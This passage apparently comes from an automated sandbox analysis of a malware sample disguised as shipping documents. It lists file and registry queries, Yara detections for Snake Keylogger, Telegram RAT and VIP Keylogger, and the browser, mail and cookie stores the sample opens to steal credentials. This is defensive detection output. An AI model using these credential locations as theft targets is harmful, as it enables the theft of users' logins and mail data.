Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Queries volume information: C:\Users\user\AppData\Roaming\tdcorV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
